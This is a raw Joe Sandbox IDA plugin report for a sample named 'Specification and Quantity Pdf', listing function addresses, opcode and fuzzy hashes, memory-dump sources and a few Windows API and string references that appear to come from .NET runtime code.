Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1d6c5c74579766a181c76732d0e982c6beea5bccfddb835f43d11907d24d000
Instruction ID: 5a3ecb3fe561c65dfa9acdb6a7faf22db6aa34e407149261de9c3514eb3ae977
Opcode Fuzzy Hash: c1d6c5c74579766a181c76732d0e982c6beea5bccfddb835f43d11907d24d000
Instruction Fuzzy Hash: 4961E423B3AF8549D997DB759090668E259BF667C1F948332ED4F33780EF3DA1928210

Function 00007FF773D30200 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5e064a75470d3b12434700b37e535a9a449cf43c98d28f8e1c4881788e2503
Instruction ID: 17b34a5ff1f92d65da477f7c34cf63dd639c787216b4f2abff418a0175718b96
Opcode Fuzzy Hash: 3c5e064a75470d3b12434700b37e535a9a449cf43c98d28f8e1c4881788e2503
Instruction Fuzzy Hash: 80512623A396819AE794EF66D8445B9B7A0EF58B84F888135FE4D93B44EF3CD941C310

Function 00007FF773C73640 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 037180d382d50411797ef5447beba6102d2d9aae5c3127ec27b5573139ad0381
Instruction ID: c80746d80f2f72b5edd9adf3a3b21ec8599d3e2683a1909b620175d306e45bf2
Opcode Fuzzy Hash: 037180d382d50411797ef5447beba6102d2d9aae5c3127ec27b5573139ad0381
Instruction Fuzzy Hash: 04610633E38B8145D696D7649441978F29ABF817C5BD49332ED4F72290DF3EA1A2C710

Function 00007FF773C8C800 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 096d27cd634f33b2b39273a113a3bfa11cc36e2ee31c477455c3f03cc6ef90c3
Instruction ID: 329e6defa85e47add70e6f519b632d1988949f2898380c48e6579884d5c6faa7
Opcode Fuzzy Hash: 096d27cd634f33b2b39273a113a3bfa11cc36e2ee31c477455c3f03cc6ef90c3
Instruction Fuzzy Hash: D361BD33B38B5582DA80AF49E4402E9F761FB44BA0F899232DAAE67794CF7CD551C310

Function 00007FF773D0CC30 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8488435c80d20a63b5b51d94c773dc6c83ce4d876cdd784b59539f6ecbcefddf
Instruction ID: a582813289521573d2ed9997aaed9187d2a6880e7bdca7c3a50eaef529f27352
Opcode Fuzzy Hash: 8488435c80d20a63b5b51d94c773dc6c83ce4d876cdd784b59539f6ecbcefddf
Instruction Fuzzy Hash: 6B515273B3C50285EEA4BB66D8542B8A250AF94FC4F944032DA5E5F7E5DF2CE8458320

Function 00007FF773C76610 Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f371b7c663320aac0712d55089f2ff7daf330af024b6290ddde3f6ee4752e1a
Instruction ID: 022a334bf5019931644b8b4fa5eaf4930514d06a025b508628da6f1056d86d60
Opcode Fuzzy Hash: 9f371b7c663320aac0712d55089f2ff7daf330af024b6290ddde3f6ee4752e1a
Instruction Fuzzy Hash: 1F419D67B38A8A86EE40DF56D4441A8B361F748BC0BC99032DE1E67755DF3CE562C310

Function 00007FF773D34450 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f369d52a6617cb0b410c6854dde9fc91c82fa898c3b7573e9b41fa6fd70f80a6
Instruction ID: a2851075196e308d2a9202a1edbdb89ac66fb6875e29520d0677e7dba8a4bfbf
Opcode Fuzzy Hash: f369d52a6617cb0b410c6854dde9fc91c82fa898c3b7573e9b41fa6fd70f80a6
Instruction Fuzzy Hash: B731F223F3C15286EAD4BA669C441B99661AF84BC4FE48035ED1EA77D6DF2CEC418360

Function 00007FF773D12AC0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed14c80dd863059f2dff2c32daa8a57b105c1426a02afba91e4b980da70f0663
Instruction ID: a44108be7c0ed2c3e7f8fa5c5c0e1f9aee358f3ced86198626f9d35d105d4ca1
Opcode Fuzzy Hash: ed14c80dd863059f2dff2c32daa8a57b105c1426a02afba91e4b980da70f0663
Instruction Fuzzy Hash: 3541BC33B14BA489E715CFB5E8406ED77B5BB48348F65812AEE8CA7A08DF34C592C700

Function 00007FF773C81470 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 84561d1d573fde311a2d707e79fc372032f8b9738f604961ab49bf565c1bdabe
Instruction ID: 525f7b3de7d72b1d702acf16d781593de37e5e779e5600e66d3ee6c20a48aa83
Opcode Fuzzy Hash: 84561d1d573fde311a2d707e79fc372032f8b9738f604961ab49bf565c1bdabe
Instruction Fuzzy Hash: A3218A23B3865242FBE4AB69A2D66BE5391DB85780F846031DE0E13FC6DD2DD5914A10

Function 00007FF773D37A90 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e58d2d3fb35aab4af4c2e43eeb53387022bca1717b85e2f8311d2cb9bfc17508
Instruction ID: c38c1c93bc9ce4d67fab94b3a71645c2283c0720925c490f219af930af07308d
Opcode Fuzzy Hash: e58d2d3fb35aab4af4c2e43eeb53387022bca1717b85e2f8311d2cb9bfc17508
Instruction Fuzzy Hash: 6B112763B2964685E655BF52F8811BAD351AF857D0F988432EF0C5B785CE3CD481C350

Function 00007FF773CDF9C0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8062c5b0bfe5bc4dfaf79245516a6f0a8f2a6c954b61e061f0a9d370f9ed3bdd
Instruction ID: b74c9156d319a549e216d728992873fe6900482b16159f5276e238170501463b
Opcode Fuzzy Hash: 8062c5b0bfe5bc4dfaf79245516a6f0a8f2a6c954b61e061f0a9d370f9ed3bdd
Instruction Fuzzy Hash: C3F03A02F3900A45F98CBA72582A2BAC2A10F97B80FE06831F91E7B7C7DD1C941213A4

Function 00007FF773CDFAA0 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13412aaf4960266ba0ca3712be346c71a13c8dc86ffbd22705df66a78fb92546
Instruction ID: 123da8899c882806f26eba6b22875e8bf54ea835bbfa836712c30326ebd2efcf
Opcode Fuzzy Hash: 13412aaf4960266ba0ca3712be346c71a13c8dc86ffbd22705df66a78fb92546
Instruction Fuzzy Hash: 9CE04F06F3910A05F98CBAA258662FAC1611FA6780FE46431FA1E77BD7DD2CA41153A0

Function 00007FF773CC9FC0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8fe89d949a41ba888f42414d67c881266776e3cb583dd9942f77cc6f741983c
Instruction ID: 7eada74ea627253887c508ac8cdf5ffdcf07464c401c6a2f1e1075d59dcd00a1
Opcode Fuzzy Hash: e8fe89d949a41ba888f42414d67c881266776e3cb583dd9942f77cc6f741983c
Instruction Fuzzy Hash: 6ED05205F3801A00EC88BA634C290BAC2600F66BC0EE42172AD0EBBB969E0CA4124358

Function 00007FF773CB90A0 Relevance: 33.4, APIs: 9, Strings: 10, Instructions: 136COMMON

Download Yara Rule

APIs

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF773CB9193
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF773CB91B0

Strings

persian, xrefs: 00007FF773CB9217
islamic-umalqura, xrefs: 00007FF773CB924B
gregorian, xrefs: 00007FF773CB9189
dangi, xrefs: 00007FF773CB91FD
calendar, xrefs: 00007FF773CB9102
hebrew, xrefs: 00007FF773CB91E0
islamic, xrefs: 00007FF773CB9231
japanese, xrefs: 00007FF773CB91A6
buddhist, xrefs: 00007FF773CB91C3
roc, xrefs: 00007FF773CB9265

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: _stricmp
String ID: buddhist$calendar$dangi$gregorian$hebrew$islamic$islamic-umalqura$japanese$persian$roc
API String ID: 2884411883-3649728362
Opcode ID: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
Instruction ID: 0ca44a3683b0d32ab59a9b88caabe265103662a8e6674e8c34cdd819123f7552
Opcode Fuzzy Hash: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
Instruction Fuzzy Hash: 94515027E3C68391EAD1BB55E8143B5E3A4EF96784FC12032DC8E66694EF6CE405D360

Function 00007FF773C5C1A0 Relevance: 24.1, APIs: 8, Strings: 8, Instructions: 101stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C1DE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C206
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C226
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C246
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C266
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C28A
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C2AE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF773C62967,?,?,?,?,00007FF773C5B845), ref: 00007FF773C5C2D2

Strings

GCHeapHardLimitSOH, xrefs: 00007FF773C5C21C
GCHeapHardLimitPOH, xrefs: 00007FF773C5C25C
GCHeapHardLimitPercent, xrefs: 00007FF773C5C1FC
GCHeapHardLimitLOH, xrefs: 00007FF773C5C23C
GCHeapHardLimitLOHPercent, xrefs: 00007FF773C5C2A4
GCHeapHardLimitPOHPercent, xrefs: 00007FF773C5C2C8
GCHeapHardLimit, xrefs: 00007FF773C5C1D7
GCHeapHardLimitSOHPercent, xrefs: 00007FF773C5C280

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: strcmp
String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
API String ID: 1004003707-945519297
Opcode ID: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
Instruction ID: 1c932033ea3512299f29849a8295e210f1b3388cff807e6c523b8dda78d24987
Opcode Fuzzy Hash: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
Instruction Fuzzy Hash: EC413A66F3C64240E9D0BB55A9401B5D261AF417F4FD84332D8BD776E5EF1CE9428270

Function 00007FF773C5B3B0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 84libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,?,00007FF773C55007), ref: 00007FF773C5B3D3
GetProcAddress.KERNEL32(?,?,?,?,?,00007FF773C55007), ref: 00007FF773C5B3E8
GetEnabledXStateFeatures.KERNEL32(?,?,?,?,?,00007FF773C55007), ref: 00007FF773C5B3F5
InitializeContext.KERNEL32(?,?,?,?,?,00007FF773C55007), ref: 00007FF773C5B433
GetLastError.KERNEL32(?,?,?,?,?,00007FF773C55007), ref: 00007FF773C5B441
InitializeContext.KERNEL32(?,?,?,?,?,00007FF773C55007), ref: 00007FF773C5B495

Strings

kernel32.dll, xrefs: 00007FF773C5B3CC
InitializeContext2, xrefs: 00007FF773C5B3DE

Memory Dump Source

Source File: 00000000.00000002.1314914980.00007FF773C51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF773C50000, based on PE: true

Associated: 00000000.00000002.1314887649.00007FF773C50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315021715.00007FF773D39000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315069465.00007FF773D6A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DD7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315131478.00007FF773DDC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773DDF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1315310303.00007FF773E28000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff773c50000_Specification and Quantity Pdf.jbxd

Similarity

API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
String ID: InitializeContext2$kernel32.dll
API String ID: 4102459504-3117029998
Opcode ID: bf7d35e48df714c612ab66266faaa2ff6652ce620ea3f11c073d427a00be551f
Instruction ID: 8cfb7f31477d77feefbffe6a4e2243bcb6d9d0d44f1a7df4555ccacfd5005955
Opcode Fuzzy Hash: bf7d35e48df714c612ab66266faaa2ff6652ce620ea3f11c073d427a00be551f
Instruction Fuzzy Hash: FC318C23B3CB5682EA90AF95A440279F790EF44791F980432DD9D627A4DF7CE486C720

Function 00007FF773C54E90 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 83threadlibraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 00007FF773C5B731
GetProcAddress.KERNEL32 ref: 00007FF773C5B741
GetLastError.KERNEL32 ref: 00007FF773C5B794
SuspendThread.KERNEL32 ref: 00007FF773C5B7AD
GetThreadContext.KERNEL32 ref: 00007FF773C5B7C8
